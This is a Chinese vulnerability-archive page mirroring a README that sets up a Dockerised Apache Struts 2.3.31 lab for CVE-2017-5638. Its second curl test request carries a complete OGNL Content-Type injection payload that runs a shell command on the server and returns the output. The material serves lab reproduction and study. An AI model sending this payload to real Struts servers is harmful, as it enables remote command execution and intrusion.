目标达成 感谢每一位支持者 — 我们达成了 100% 目标!

目标: 1000 元 · 已筹: 1310

100%

CVE-2017-5638 PoC — Apache Struts 2 输入验证错误漏洞

来源
关联漏洞
标题:Apache Struts 2 输入验证错误漏洞 (CVE-2017-5638)
Description:Apache Struts是美国阿帕奇(Apache)软件基金会的一个开源项目,是一套用于创建企业级Java Web应用的开源MVC框架,主要提供两个版本框架产品,Struts 1和Struts 2。 Apache Struts 2 2.3.32之前的2 2.3.x版本和2.5.10.1之前的2.5.x版本中的Jakarta Multipart解析器存在安全漏洞,该漏洞源于程序没有正确处理文件上传。远程攻击者可借助带有#cmd=字符串的特制Content-Type HTTP头利用该漏洞执行任意命令。
Description
Build the struts-2.3.31 (CVE-2017-5638) environment
介绍
# vulnerability_struts-2.3.31
Build the struts-2.3.31 (CVE-2017-5638) environment.
https request is possible.

## environment
Ubuntu 20.04
Docker 20.10.12
curl 7.68.0

## Server Startup
We will use the tomcat:7.0-jre8 docker image.
Unzip struts-2.3.31.zip in a directory of your choice.
cd struts-2.3.31
sudo docker build -t struts/2_3_31 .
sudo docker run -it --rm -p 8443:8443 struts/2_3_31

## Test Request
one(expect 200OK)
curl --location --request GET 'https://127.0.0.1:8443/struts2-showcase/showcase.action' -k -I

another(expect 200OK)
curl --location --request GET 'https://127.0.0.1:8443/struts2-showcase/showcase.action' --header 'Content-Type: %{(#_='\''multipart/form-data'\'').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['\''com.opensymphony.xwork2.ActionContext.container'\'']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='\''ls'\'').(#iswin=(@java.lang.System@getProperty('\''os.name'\'').toLowerCase().contains('\''win'\''))).(#cmds=(#iswin?{'\''cmd.exe'\'','\''/c'\'',#cmd}:{'\''/bin/bash'\'','\''-c'\'',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}'  -k

## Detail
struts2-showcase.war is downloaded below
https://archive.apache.org/dist/struts/2.3.31/

server.xml is tomcat setting file.
It edited for ssl enable. 
文件快照

登录后查看神龙缓存的 POC 文件快照

登录查看
备注
    1. 建议优先通过来源进行访问。
    2. 本地 POC 快照面向订阅用户开放;当原始来源失效或无法访问时,本地镜像作为订阅权益的一部分提供。
    3. 持续抓取、验证、维护这份 POC 档案需要不少投入,因此本地快照已纳入付费订阅。您的订阅是让这份资料能继续走下去的关键,由衷感谢。 查看订阅方案 →